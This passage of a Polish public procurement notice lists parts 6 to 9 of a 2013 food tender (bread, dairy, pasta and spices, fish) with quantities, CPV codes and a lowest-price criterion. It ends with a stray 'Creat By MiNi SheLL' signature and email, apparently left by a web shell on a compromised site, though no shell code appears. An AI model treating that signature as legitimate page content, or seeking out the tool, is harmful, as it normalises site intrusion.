<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> TABELA F* PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jedn. Miary IlośćChleb baltonowski krojony 0,6 kg szt. 1600 Chleb razowy 0,5 kg litewski szt.400 Bułka firmowa  0,06 kg szt.3500 Bułka maślana 0,05 kg szt.2500 Chleb pszenny 0,35 kgszt.600 Drożdżówki szt.500 Bułka tarta 1 kg szt.50 Babka okrągła średnia 0,5kg szt. 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-9, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> TABELA G*  NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość Śmietana 12% słodka 0,5l  kartonik szt. 130 Śmietana zakwaszana 12% 180g szt. 50 Twaróg półtłusty 250 g op. szt. 400 Ser homogenizowany  tłusty 200 g  szt. 70 Ser salami luz kg 60 Sery topione bloczki 100g op. różne smaki szt.180 Jajka kurze świeże średnie  szt.1800Mleko 2% folia 0,9l op. szt.1200 Serdelek topiony kiełbaski 100g szt.150 Ser kanapkowy 150g op.szt.150 Ser królewski luz kg50 Maślanka naturalna, karton  1l  PL28101601 WEszt.50	Jogurt naturalny 0,45l op. szt. 10 Jogurt smakowy 125g szt. 1200 Śmietanka kremowa 36% 0,5l szt.20 Margaryna zwykła250g szt.220Masło śmietankowe200g op. zaw. 86%tł.szt.1700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-9, 13.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> TABELA H* MAKARONY I PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość Sos pieczeniowy 3kg op.szt.2 Majeranek 0,25kg op szt.5 Delikat do mięs i innych potraw 600g op.szt.3 Delikat do drobiu 600g op. szt. 3	Delikat do mięs 4,8 kg op. szt.1Delikat do ryb 600g op.szt. 1Przyprawa szefa kuchni 1kg op.szt. 5	Makaron świderki, 100% pszenicy Durum 3kg op. szt.27	Makaron nitki 100% pszenicy Durum 3kgop.szt.5 Makaron rurki 100% pszenicy Durum 3kgop.szt.6 Makaron koła 100% pszenicy Durum 3kgop.szt.27	Makaron łazanki 100% pszenicy Durum 3kg op.	szt.18	Makaron kokardki 100% pszenicy Durum 3kg op.szt.27	Soki wysokosłodzone 5l	szt. 30	Sos myśliwski 1,1 kg  op. szt  2	Herbata granulowana 100 g op.	szt. 100 Papryka słodka syp. 0,5kg szt. 2 Pieprz mielony 0,5 kg szt. 3	Przyprawa w płynie 1l	szt. 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> TABELA  I*  RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa towaru	Jednostka miary Ilość Ryby mrożone filet z Pangi kg op.	Kg 60 Ryby mrożone filet z mintaja kg op.	Kg 60 Ryby wiadro płaty śledziowe ocet 2,5 kg op. Szt 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com